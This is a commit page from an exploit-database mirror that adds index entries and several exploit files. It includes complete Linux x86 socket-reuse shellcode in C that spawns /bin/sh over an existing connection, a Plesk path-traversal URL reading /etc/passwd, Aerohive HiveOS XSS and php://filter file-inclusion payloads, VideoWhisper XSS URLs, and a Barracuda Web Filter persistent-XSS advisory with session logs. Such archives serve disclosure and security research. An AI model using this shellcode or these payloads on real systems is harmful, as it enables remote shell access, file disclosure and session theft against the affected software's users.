bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 07_24_2014

Browse source
This commit is contained in:
Offensive Security 2014-07-24 04:40:20 +00:00
parent 2ea55e459e
commit 857d210af1
18 changed files with 1028 additions and 0 deletions

17
files.csv
View file

@ -30657,6 +30657,7 @@ id,file,description,date,author,platform,type,port
34034,platforms/asp/webapps/34034.txt,"cyberhost 'default.asp' SQL Injection Vulnerability",2010-05-22,redst0rm,asp,webapps,0
34035,platforms/php/webapps/34035.sjs,"OpenForum 2.2 b005 'saveAsAttachment()' Method Arbitrary File Creation Vulnerability",2010-05-23,"John Leitch",php,webapps,0
34037,platforms/win32/local/34037.txt,"OpenVPN Private Tunnel Core Service - Unquoted Service Path Elevation Of Privilege",2014-07-12,LiquidWorm,win32,local,0
34038,platforms/php/webapps/34038.txt,"Aerohive HiveOS 5.1r5 - 6.1r5 - Multiple Vulnerabilities",2014-07-12,DearBytes,php,webapps,0
34040,platforms/php/webapps/34040.txt,"razorCMS 1.0 'admin/index.php' HTML Injection Vulnerability",2010-05-24,"High-Tech Bridge SA",php,webapps,0
34041,platforms/php/webapps/34041.txt,"GetSimple CMS 2.01 'components.php' Cross Site Scripting Vulnerability",2010-05-24,"High-Tech Bridge SA",php,webapps,0
34042,platforms/php/webapps/34042.txt,"RuubikCMS 1.0.3 'index.php' Cross Site Scripting Vulnerability",2010-05-24,"High-Tech Bridge SA",php,webapps,0
@ -30676,6 +30677,8 @@ id,file,description,date,author,platform,type,port
34056,platforms/php/webapps/34056.txt,"Joomla! 1.5.x Multiple Modules 'search' Parameter Cross-Site Scripting Vulnerabilities",2010-05-28,"Riyaz Ahemed Walikar",php,webapps,0
34057,platforms/php/webapps/34057.txt,"wsCMS 'news.php' Cross Site Scripting Vulnerability",2010-05-31,cyberlog,php,webapps,0
34058,platforms/multiple/dos/34058.txt,"DM Database Server 'SP_DEL_BAK_EXPIRED' Memory Corruption Vulnerability",2010-05-31,"Shennan Wang HuaweiSymantec SRT",multiple,dos,0
34059,platforms/windows/remote/34059.py,"Kolibri WebServer 2.0 - GET Request SEH Exploit",2014-07-14,"Revin Hadi Saputra",windows,remote,0
34060,platforms/lin_x86/shellcode/34060.c,"Socket Re-use Shellcode for Linux x86 (50 bytes)",2014-07-14,ZadYree,lin_x86,shellcode,0
34062,platforms/php/webapps/34062.txt,"Shopizer 1.1.5 - Multiple Vulnerabilities",2014-07-14,"SEC Consult",php,webapps,80
34063,platforms/hardware/remote/34063.rb,"D-Link info.cgi POST Request Buffer Overflow",2014-07-14,metasploit,hardware,remote,80
34064,platforms/hardware/remote/34064.rb,"D-Link HNAP Request Remote Buffer Overflow",2014-07-14,metasploit,hardware,remote,80
@ -30735,7 +30738,21 @@ id,file,description,date,author,platform,type,port
34128,platforms/hardware/webapps/34128.py,"MTS MBlaze Ultra Wi-Fi / ZTE AC3633 - Multiple Vulnerabilities",2014-07-21,"Ajin Abraham",hardware,webapps,80
34129,platforms/windows/dos/34129.txt,"World Of Warcraft 3.3.5a (macros-cache.txt) - Stack Overflow",2014-07-21,"Alireza Chegini",windows,dos,0
34130,platforms/linux/webapps/34130.rb,"Raritan PowerIQ 4.1.0 - SQL Injection Vulnerability",2014-07-21,"Brandon Perry",linux,webapps,80
34131,platforms/windows/local/34131.py,"Microsoft XP SP3 - BthPan.sys Arbitrary Write Privilege Escalation",2014-07-21,KoreLogic,windows,local,0
34132,platforms/php/remote/34132.txt,"IBM GCM16/32 1.20.0.22575 - Multiple Vulnerabilities",2014-07-21,"Alejandro Alvarez Bravo",php,remote,443
34133,platforms/linux/dos/34133.txt,"Apache 2.4.7 mod_status Scoreboard Handling Race Condition",2014-07-21,"Marek Kroemeke",linux,dos,0
34134,platforms/lin_amd64/local/34134.c,"Linux Kernel ptrace/sysret - Local Privilege Escalation",2014-07-21,"Vitaly Nikolenko",lin_amd64,local,0
34135,platforms/windows/dos/34135.py,"DjVuLibre <= 3.5.25.3 - Out of Bounds Access Violation",2014-07-22,drone,windows,dos,0
34136,platforms/multiple/remote/34136.txt,"Plesk Server Administrator (PSA) 'locale' Parameter Local File Include Vulnerability",2010-06-21,"Pouya Daneshmand",multiple,remote,0
34137,platforms/php/webapps/34137.txt,"Joomla! 'com_videowhisper_2wvc' Component Cross Site Scripting Vulnerability",2010-06-10,Sid3^effects,php,webapps,0
34138,platforms/php/webapps/34138.txt,"VideoWhisper PHP 2 Way Video Chat 'r' Parameter Cross Site Scripting Vulnerability",2010-06-14,Sid3^effects,php,webapps,0
34139,platforms/php/webapps/34139.txt,"Yamamah Photo Gallery 1.00 'download.php' Local File Disclosure Vulnerability",2010-06-13,mat,php,webapps,0
34140,platforms/php/webapps/34140.txt,"AneCMS 1.x 'modules/blog/index.php' HTML Injection Vulnerability",2010-06-11,"High-Tech Bridge SA",php,webapps,0
34141,platforms/php/webapps/34141.txt,"AneCMS 1.x 'modules/blog/index.php' SQL Injection Vulnerability",2010-06-11,"High-Tech Bridge SA",php,webapps,0
34142,platforms/php/webapps/34142.txt,"MODx 1.0.3 'index.php' Multiple SQL Injection Vulnerabilities",2010-06-14,"High-Tech Bridge SA",php,webapps,0
34143,platforms/windows/remote/34143.txt,"XnView <= 1.97.4 - MBM File Remote Heap Buffer Overflow Vulnerability",2010-06-14,"Mauro Olea",windows,remote,0
34144,platforms/php/webapps/34144.txt,"Joomla! 'com_easygb' Component 'Itemid' Parameter Cross Site Scripting Vulnerability",2010-06-08,"L0rd CrusAd3r",php,webapps,0
34145,platforms/unix/dos/34145.txt,"Python <= 3.2 'audioop' Module Memory Corruption Vulnerability",2010-06-14,haypo,unix,dos,0
34146,platforms/php/webapps/34146.txt,"Sell@Site PHP Online Jobs Login Multiple SQL Injection Vulnerabilities",2010-06-15,"L0rd CrusAd3r",php,webapps,0
34147,platforms/php/webapps/34147.txt,"JForum 2.1.8 'username' Parameter Cross Site Scripting Vulnerability",2010-06-06,"Adam Baldwin",php,webapps,0
34148,platforms/multiple/webapps/34148.TXT,"Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass & Persistent Vulnerability",2014-07-23,Vulnerability-Lab,multiple,webapps,0

Can't render this file because it is too large.

66
platforms/lin_x86/shellcode/34060.c Executable file
View file

@ -0,0 +1,66 @@
/* Socket Re-use Combo for linux x86 systems by ZadYree -- 50 bytes
* <zadyree@tuxfamily.org>
*
* Made using sockfd trick + dup2(0,0), dup2(0,1), dup2(0,2) +
* execve /bin/sh
*
* Thanks: Charles Stevenson, ipv, 3LRVS research team
*
* gcc -o socket_reuse socket_reuse.c -z execstack
*/
char shellcode[]= /* We use sys_dup(2) to get the previous attributed sockfd */
"\x6a\x02" // push 0x2
"\x5b" // pop ebx
"\x6a\x29" // push 0x29
"\x58" // pop eax
"\xcd\x80" // int 0x80 -> call dup(2)
"\x48" // dec eax
/* Now EAX = our Socket File Descriptor */
"\x89\xc6" // mov esi, eax
/* dup2(fd,0); dup2(fd,1); dup2(fd,2); */
"\x31\xc9" // xor %ecx,%ecx
"\x56" // push %esi
"\x5b" // pop %ebx
// loop:
"\x6a\x3f" // push $0x3f
"\x58" // pop %eax
"\xcd\x80" // int $0x80
"\x41" // inc %ecx
"\x80\xf9\x03" // cmp $0x3,%cl
"\x75\xf5" // jne 80483e8 <loop>
/* execve /bin/sh by ipv */
"\x6a\x0b" // push byte 0xb
"\x58" // pop eax
"\x99" // cdq
"\x52" // push edx
"\x31\xf6" // xor esi, esi - We add those instructions
"\x56" // push esi - to clean up the arg stack
"\x68\x2f\x2f\x73\x68" // push dword 0x68732f2f
"\x68\x2f\x62\x69\x6e" // push dword 0x6e69922f
"\x89\xe3" // mov ebx, esp
"\x31\xc9" // xor ecx, ecx
"\xcd\x80"; // int 0x80
;
/*
shellcode[]=
"\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6"
"\x31\xc9\x56\x5b\x6a\x3f\x58\xcd\x80\x41\x80"
"\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6"
"\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
"\x89\xe3\x31\xc9\xcd\x80";
*/
int main(void)
{
printf("Shellcode length: %d\n", strlen(shellcode));
(*(void(*)()) shellcode)();
return 0;
}

7
platforms/multiple/remote/34136.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/40813/info
Plesk Server Administrator (PSA) is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
https://www.example.com/servlet/Help?system_id=pem&book_type=login&help_id=change_password&locale=/../../../../../../etc/passwd%00

444
platforms/multiple/webapps/34148.TXT Executable file
View file

@ -0,0 +1,444 @@
Document Title:
===============
Barracuda Networks #35 Web Firewall 610 v6.0.1 - Filter Bypass & Persistent Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1101
Barracuda Networks Security ID (BNSEC): BNSEC-2361
http://www.barracuda.com/kb?id=501600000013m4O
Solution #00006619
BNSEC-02361: Authenticated persistent IVE in Barracuda Web Filter v6.0.1
Release Date:
=============
2014-07-22
Vulnerability Laboratory ID (VL-ID):
====================================
1101
Common Vulnerability Scoring System:
====================================
3.7
Product & Service Introduction:
===============================
The Barracuda Web Filter is an integrated content filtering, application blocking and malware protection solution that is powerful,
easy to use and affordable for businesses of all sizes. It enforces Internet usage policies by blocking access to Web sites and
Internet applications that are not related to business, and it easily and completely eliminates spyware and other forms of malware
from your organization. No more costly staff time lost repairing infected computers.
( Copy of the Vendor Homepage: https://www.barracuda.com/products/webfilter )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple persistent input validation web vulnerabilities and a filter bypass issue in
the Barracuda Networks WebFilter 610-Vx appliance web-application.
Vulnerability Disclosure Timeline:
==================================
2013-12-27: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2013-12-28: Vendor Notification (Barracuda Networks Security Team - Bug Bounty Program)
2014-01-19: Vendor Response/Feedback (Barracuda Networks Security Team - Bug Bounty Program)
2014-07-15: Vendor Fix/Patch (Barracuda Networks Developer Team) [Coordination: Dave Farrow]
2014-07-22: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Barracuda Networks
Product: WebFilter Appliance Web-Application 6.0.1.009 - X210 X310 X410 X510 X610 X710 X810 X910 X1010
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
Multiple persistent input validation web vulnerabilities and a filter bypass has been discovered in the Barracuda Networks WebFilter Model 610Vx appliance web-application.
The vulnerability allows remote attackers to inject own malicious script codes on the application-side of the affected service, module or function.
The vulnerability are located in the `domain names`, `grid__data in grid_columns` and `x-grid3-cell-inner x-grid3-col-name`
values of the `Basic > Reports` module. Remote attackers are able to inject own script code as domain name to execute the
context in the show advanced options menu listing (+plus). The attack vector is persistent located on the application-side
and the request method to inject is POST.
To bypass the invalid domain exception the attacker first need to include a valid domain, in the second step he change the domain name value by a
session tamper. Reason behind the technique is that the input field validation is separatly done to the request method validation. The restriction
of the invalid input field check can be bypassed by usage of a session tamper to change the input field context live after the first direct input
encode of the web filter application. Another problem is located in the same module which affects the buttom name item listing.
The security risk of the persistent input validation web vulnerability and fitler bypass is estimated as medium with a cvss (common vulnerability scoring
system) count of 3.7. Exploitation of the persistent web vulnerability requires low user interaction and a local low privileged web-application account.
Successful exploitation of the vulnerability results in session hijacking (customers), persistent phishing, persistent external redirects or persistent
manipulation of connected or affected module context.
Request Method(s):
[+] GET
[+] POST
Vulnerable Module(s):
[+] Basic > Reports > Advanced Options > Show Advanced Options
Vulnerable Input Field(s):
[+] Add Domain
Vulnerable Parameter(s):
[+] domain name
[+] grid__data in grid_columns
[+] x-grid3-cell-inner x-grid3-col-name
Affected Module(s):
[+] Reports Module Index
[+] Reports Module Advanced Options List
[+] Buttom Name Item List
Affected Version(s):
[+] All versions > Web-Filter applicance web-application
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with a low privileged web-application user account and low or medium
user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
--- PoC Session Logs Request/Response Input Execution ---
Status: 200[OK]
GET https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi?auth_type=Local&et=1380375181&locale=en_US&password=70be67622c59f4862ed9e7bc6a7cc3d2&primary_tab=BASIC&realm=&role=&secondary_tab=reports&user=guest
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[160284] Mime Type[text/html]
Request Headers:
Host[webfilter.ptest.localhost:6317]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Connection[keep-alive]
Cache-Control[max-age=0]
Response Headers:
Server[nginx/1.0.14]
Content-Type[text/html; charset=utf-8]
Connection[keep-alive]
Expires[Fri, 28 Sep 2012 13:22:20 GMT]
Date[Sat, 28 Sep 2013 13:22:20 GMT]
Content-Length[160284]
15:22:11.590[793ms][total 793ms] Status: 304[Not Modified]
GET https://webfilter.ptest.localhost:6317/css/calendar/calendar-win2k-cold-1.css?v=6.0.1.009 Load Flags[VALIDATE_ALWAYS ] Content Size[-1] Mime Type[application/x-unknown-content-type]
Request Headers:
Host[webfilter.ptest.localhost:6317]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/css,*/*;q=0.1]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi?auth_type=Local&et=1380375181&locale=en_US&password=70be67622c59f4862ed9e7bc6a7cc3d2&primary_tab=BASIC&realm=&role=&secondary_tab=reports&user=guest]
Connection[keep-alive]
If-Modified-Since[Tue, 23 Jul 2013 02:54:15 GMT]
Cache-Control[max-age=0]
Response Headers:
Server[nginx/1.0.14]
Date[Sat, 28 Sep 2013 13:22:21 GMT]
Last-Modified[Tue, 23 Jul 2013 02:54:15 GMT]
Connection[keep-alive]
Expires[Thu, 31 Dec 2037 23:55:55 GMT]
Cache-Control[max-age=315360000, public]
15:22:11.590[794ms][total 794ms] Status: 304[Not Modified]
GET https://webfilter.ptest.localhost:6317/css/autosuggest.css?v=6.0.1.009 Load Flags[VALIDATE_ALWAYS ] Content Size[-1] Mime Type[application/x-unknown-content-type]
Request Headers:
Host[webfilter.ptest.localhost:6317]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/css,*/*;q=0.1]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi?auth_type=Local&et=1380375181&locale=en_US&password=70be67622c59f4862ed9e7bc6a7cc3d2&primary_tab=BASIC&realm=&role=&secondary_tab=reports&user=guest]
Connection[keep-alive]
If-Modified-Since[Tue, 23 Jul 2013 02:54:15 GMT]
Cache-Control[max-age=0]
Response Headers:
Server[nginx/1.0.14]
Date[Sat, 28 Sep 2013 13:22:21 GMT]
Last-Modified[Tue, 23 Jul 2013 02:54:15 GMT]
Connection[keep-alive]
Expires[Thu, 31 Dec 2037 23:55:55 GMT]
Cache-Control[max-age=315360000, public]
15:22:11.591[813ms][total 813ms] Status: 304[Not Modified]
GET https://webfilter.ptest.localhost:6317/barracuda.css?v=6.0.1.009 Load Flags[VALIDATE_ALWAYS ] Content Size[-1] Mime Type[application/x-unknown-content-type]
Request Headers:
Host[webfilter.ptest.localhost:6317]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/css,*/*;q=0.1]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi?auth_type=Local&et=1380375181&locale=en_US&password=70be67622c59f4862ed9e7bc6a7cc3d2&primary_tab=BASIC&realm=&role=&secondary_tab=reports&user=guest]
Connection[keep-alive]
If-Modified-Since[Tue, 23 Jul 2013 02:54:15 GMT]
Cache-Control[max-age=0]
Response Headers:
Server[nginx/1.0.14]
Date[Sat, 28 Sep 2013 13:22:21 GMT]
Last-Modified[Tue, 23 Jul 2013 02:54:15 GMT]
Connection[keep-alive]
Expires[Thu, 31 Dec 2037 23:55:55 GMT]
Cache-Control[max-age=315360000, public]
15:22:11.594[987ms][total 987ms] Status: 304[Not Modified]
GET https://webfilter.ptest.localhost:6317/js/scriptaculous/scriptaculous.js?load=effects,dragdrop&v=6.0.1.009 Load Flags[VALIDATE_ALWAYS ] Content Size[-1] Mime Type[application/x-unknown-content-type]
Request Headers:
Host[webfilter.ptest.localhost:6317]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi?auth_type=Local&et=1380375181&locale=en_US&password=70be67622c59f4862ed9e7bc6a7cc3d2&primary_tab=BASIC&realm=&role=&secondary_tab=reports&user=guest]
Connection[keep-alive]
If-Modified-Since[Tue, 23 Jul 2013 02:54:14 GMT]
Cache-Control[max-age=0]
Response Headers:
Server[nginx/1.0.14]
Date[Sat, 28 Sep 2013 13:22:22 GMT]
Last-Modified[Tue, 23 Jul 2013 02:54:14 GMT]
Connection[keep-alive]
Expires[Thu, 31 Dec 2037 23:55:55 GMT]
Cache-Control[max-age=315360000, public]
15:22:11.594[987ms][total 987ms] Status: 304[Not Modified]
GET https://webfilter.ptest.localhost:6317/js/ext-prototype-adapter.js?v=6.0.1.009 Load Flags[VALIDATE_ALWAYS ] Content Size[-1] Mime Type[application/x-unknown-content-type]
Request Headers:
Host[webfilter.ptest.localhost:6317]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi?auth_type=Local&et=1380375181&locale=en_US&password=70be67622c59f4862ed9e7bc6a7cc3d2&primary_tab=BASIC&realm=&role=&secondary_tab=reports&user=guest]
Connection[keep-alive]
If-Modified-Since[Tue, 23 Jul 2013 02:54:14 GMT]
Cache-Control[max-age=0]
Response Headers:
Server[nginx/1.0.14]
Date[Sat, 28 Sep 2013 13:22:22 GMT]
Last-Modified[Tue, 23 Jul 2013 02:54:14 GMT]
Connection[keep-alive]
Expires[Thu, 31 Dec 2037 23:55:55 GMT]
Cache-Control[max-age=315360000, public]
15:22:13.629[260ms][total 260ms] Status: 502[Bad Gateway]
GET https://webfilter.ptest.localhost:6317/cgi-mod/x Load Flags[VALIDATE_ALWAYS ] Content Size[1789] Mime Type[text/html]
Request Headers:
Host[webfilter.ptest.localhost:6317]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi?auth_type=Local&et=1380375181&locale=en_US&password=70be67622c59f4862ed9e7bc6a7cc3d2&primary_tab=BASIC&realm=&role=&secondary_tab=reports&user=guest]
Connection[keep-alive]
Response Headers:
Server[nginx/1.0.14]
Date[Sat, 28 Sep 2013 13:22:23 GMT]
Content-Type[text/html]
Content-Length[1789]
Connection[keep-alive]
--- PoC Session Logs Request/Response Delete Element Item Execution ---
15:26:04.436[0ms][total 0ms] Status: pending[]
GET https://webfilter.ptest.localhost:6317/js/adapters/prototype-adapter.js?v=6.0.1.009 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[webfilter.ptest.localhost:6317]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi]
15:26:04.436[0ms][total 0ms] Status: pending[]
GET https://webfilter.ptest.localhost:6317/js/highcharts.js?v=6.0.1.009 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[webfilter.ptest.localhost:6317]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi]
15:26:04.461[0ms][total 0ms] Status: pending[]
GET https://webfilter.ptest.localhost:6317/favicon.ico Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[webfilter.ptest.localhost:6317]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
15:26:04.542[0ms][total 0ms] Status: pending[]
GET https://webfilter.ptest.localhost:6317/js/scriptaculous/effects.js Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[webfilter.ptest.localhost:6317]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi]
15:26:04.542[0ms][total 0ms] Status: pending[]
GET https://webfilter.ptest.localhost:6317/js/scriptaculous/dragdrop.js Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[webfilter.ptest.localhost:6317]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi]
15:26:04.964[454ms][total 454ms] Status: 200[OK]
GET https://webfilter.ptest.localhost:6317/cgi-mod/header_logo.cgi?6.0.1.009 Load Flags[LOAD_NORMAL] Content Size[-1] Mime Type[image/gif]
Request Headers:
Host[webfilter.ptest.localhost:6317]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi]
Connection[keep-alive]
Response Headers:
Server[nginx/1.0.14]
Content-Type[image/gif]
Transfer-Encoding[chunked]
Connection[keep-alive]
Expires[Sat, 28 Sep 2013 13:26:14 GMT]
Date[Sat, 28 Sep 2013 13:26:14 GMT]
Cache-Control[no-cache, no-store]
15:26:05.740[213ms][total 213ms] Status: 502[Bad Gateway]
GET https://webfilter.ptest.localhost:6317/cgi-mod/x Load Flags[LOAD_NORMAL] Content Size[1789] Mime Type[text/html]
Request Headers:
Host[webfilter.ptest.localhost:6317]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi]
Connection[keep-alive]
Response Headers:
Server[nginx/1.0.14]
Date[Sat, 28 Sep 2013 13:26:15 GMT]
Content-Type[text/html]
Content-Length[1789]
Connection[keep-alive]
Reference(s):
https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi?auth_type=Local&et=1380375181&locale=en_US&password=70be67622c59f4862ed9e7bc6a7cc3d2&primary_tab=BASIC&realm=&role=&secondary_tab=reports&user=guest
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the input to add domains. Ensure that the application GET to POST requests are restricted and filtered
to prevent further attacks in the vulnerable add domains module section.
Barracuda Networks Appliance: Advanced >Firmware Updates Page
http://www.barracuda.com/kb?id=501600000013m4O
Security Risk:
==============
The security risk of the persistent input validation web vulnerabilities and estimated as medium(+).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

53
platforms/php/webapps/34038.txt Executable file
View file

@ -0,0 +1,53 @@
# Exploit Title: Aerohive HiveOS XSS and (limited) LFI
# Date: 11-07-2014
# Exploit Author: Rik van Duijn - DearBytes (dearbytes.com)
# Vendor Homepage: http://www.aerohive.com/products/overview.html
# Version: 5.1r5 - 6.1r5 (possibly earlier versions)
Description
================
Aerohive version 5.1r5 through 6.1r5 contain two vulnerabilities, one reflective XSS vulnerability and a limited local file inclusion vulnerability (I was only able to view source from one specific folder, maybe you can leverage this further).
It's possible earlier version are affected, I was only able to review 5.1r5 briefly, the vendor indicated other version up to 6.1r5 are vulnerable as well.
Details
================
AeroHive HiveOS Version: 5.1r5 until 6.1r5 (maybe available in earlier versions, was unable to test)
Vulnerability
================
An attacker could craft an URL in order to steal a session or attack the system of the visitor to the URL. The LFI can be leveraged to view application source code, limited to one specific folder.
Proof of concept XSS
====================
Base: http://<IP>/index.php5?ERROR_INFO=<BASE64 ENCODED JAVASCRIPT/HTML>
echo -en '"><script>alert('XSS');</script>' | base64
Add the output to the ERROR_INFO variable.
Example:
http://<IP>/index.php5?ERROR_INFO=Ij48c2NyaXB0PmFsZXJ0KERlYXJCeXRlcyk7PC9zY3JpcHQ+
Proof of concept LFI
====================
Base: http://<IP>/action.php5?_action=get&_actionType=1&_page=<LFI>
Example:
http://<IP>/action.php5?_action=get&_actionType=1&_page=php://filter/convert.base64-encode/resource=ManagementAP
Fix
================
The vulnerabilities were resolved in version 6.1r5.
Disclosure Timeline
================
2014-03-12: Reported to vendor
2014-03-12: Vendor confirmed, gave tracking-id
2014-03-18: Vendor confirms issues, states it received the vulns earlier and is already addressing the issues.
2014-04-02: Requested status update
2014-04-02: Vendor indicates they once the new version is released
2014-07-07: Requested status update
2014-07-07: Vendor indicated the update was previously published

7
platforms/php/webapps/34137.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/40828/info
The VideoWhisper 2 Way Video Chat component for Joomla! is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this vulnerability could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/index.php?r=[XSS]

7
platforms/php/webapps/34138.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/40832/info
VideoWhisper PHP 2 Way Video Chat is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this vulnerability could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/index.php?r=%22%3E%3E%3Cmarquee%3E%3Ch1%3EXSS3d%20By%20Sid3^effects%3C/h1%3E%3Cmarquee%3E

9
